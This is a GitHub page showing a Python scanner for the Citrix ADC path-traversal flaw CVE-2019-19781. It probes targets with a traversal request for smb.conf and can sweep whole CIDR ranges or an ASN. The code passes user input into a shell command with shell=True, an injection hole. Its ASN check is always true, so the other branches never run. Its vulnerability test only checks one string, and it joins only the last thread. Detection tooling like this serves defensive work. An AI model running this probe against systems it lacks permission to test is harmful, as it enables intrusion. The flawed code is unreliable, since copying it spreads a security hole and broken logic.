forked from trustedsec/cve-2019-19781
/
cve-2019-19781_scanner.py
executable file
·138 lines (112 loc) · 5.44 KB
/
cve-2019-19781_scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
#!/usr/bin/env python3
#
# Single check to see if the server is still vulnerable to CVE-2019-19781
# Written by: Dave Kennedy
# Company: TrustedSec
#
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
import argparse
from netaddr import IPNetwork
import threading
import time
import subprocess
def asn_to_ip(asn):
# I searched for hours trying to find a ASN to CIDR Block library - Don't Hate.
cidr_list = []
command = 'whois -h whois.radb.net -- \'-i origin %s\' | grep -Eo "([0-9.]+){4}/[0-9]+" | head' % (asn)
asn_convert = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE)
asn_convert = asn_convert.stdout.read().decode('utf-8').splitlines()
for cidr in asn_convert:
cidr_list.append(cidr)
return cidr_list
# You can up this if you want to make it faster - default is 100
# our main function for testing the vulnerability
def check_server(target, targetport):
try:
print("Testing: %s " % target, end="\r") # Cleaning up output a little
# if for some ungodly reason they are using HTTP
if targetport == "80":
req = requests.get("http://%s:%s/vpn/../vpns/cfg/smb.conf" % (target,targetport), verify=False, timeout=2)
else:
# for all other handle HTTPS
req = requests.get("https://%s:%s/vpn/../vpns/cfg/smb.conf" % (target,targetport), verify=False, timeout=2)
# if the system is still vulnerable
if ("[global]") and ("encrypt passwords") and("name resolve order") in str(req.content): # each smb.conf will contain a [global] variable
print("[\033[91m!\033[0m] This Citrix ADC Server: %s is still vulnerable to CVE-2019-19781." % (target))
vulnServers.append(target)
# if the system responds with a Citrix message (fixed) or a 403 (fixed)
elif ("Citrix") in str(req.content) or "403" in str(req.status_code): # only seen if system is not vulnerable
print("[\033[92m*\033[0m] CITRIX Server found, However the server %s is not vulnerable. Awesome!" % (target))
# if we run into something other than Citrix
else:
#print("[-] Server %s does not appear to be a Citrix server." % (target))
pass
# handle exception errors due to timeouts
except requests.ReadTimeout:
#print("[-] ReadTimeout: Server %s timed out and didn't respond on port: %s." % (target, targetport))
pass # I don't see the value of printing non-responding servers
except requests.ConnectTimeout:
#print("[-] ConnectTimeout: Server %s did not respond to a web request or the port (%s) is not open." % (target, targetport))
pass # I don't see the value of printing non-responding servers
except requests.ConnectionError:
#print("[-] ConnectionError: Server %s did not respond to a web request or the port (%s) is not open." % (target,targetport))
pass # I don't see the value of printing non-responding servers
print("""
_______ ________ ___ ___ __ ___ __ ___ ______ ___ __
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ |/ _ \____ / _ \/_ |
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | (_) | / / (_) || |
| | \ \/ / | __|______/ /| | | || |\__, |______| |\__, | / / > _ < | |
| |____ \ / | |____ / /_| |_| || | / / | | / / / / | (_) || |
\_____| \/ |______| |____|\___/ |_| /_/ |_| /_/ /_/ \___/ |_|
CVE-2019-19781-Scanner
Company: TrustedSec
Written by: Dave Kennedy
This will look to see if the remote system is still vulnerable to CVE-2019-19781. This
will only scan one host at a time.
You can use CIDR notations as well for example: 192.168.1.1/24
You can use hostnames instead of IP addresses also.
Example: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443
Example2: python3 cve-2019-19781_scanner.py 192.168.1.1 443
Example3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443
Example4: python3 cve-2019-19781_scanner.py as15169 443
Usage: python3 cve-2019-19781_scanner.py targetip targetport
""")
counter = 0
vulnServers = []
# parse our commands
parser = argparse.ArgumentParser()
parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
parser.add_argument("targetport", help="the target server web port (normally on 443)")
args = parser.parse_args()
if "as" or "AS" in args.target:
CIDR_Blocks = asn_to_ip(args.target)
for ip_block in CIDR_Blocks:
for ip in IPNetwork(ip_block):
thread = threading.Thread(target=check_server, args=(ip,args.targetport))
thread.start()
time.sleep(0.05)
# wait for the threads to complete
thread.join()
# if we are iterating through IP addresses to scan CIDR notations
elif "/" in args.target:
for ip in IPNetwork(args.target):
counter = counter + 1
thread = threading.Thread(target=check_server, args=(ip,args.targetport))
thread.start()
time.sleep(0.05)
# wait for the threads to complete
thread.join()
# if we are just using 1 IP address
else:
counter = counter + 1
check_server(args.target, args.targetport)
# do a report on vuln servers
if len(vulnServers) > 0:
if counter == 1: countername = "was"
else: countername = "were"
print("Tested %s Servers : %s %s vulnerable" % (counter, len(vulnServers), countername))
print("-" * 45)
for server in vulnServers:
print(server)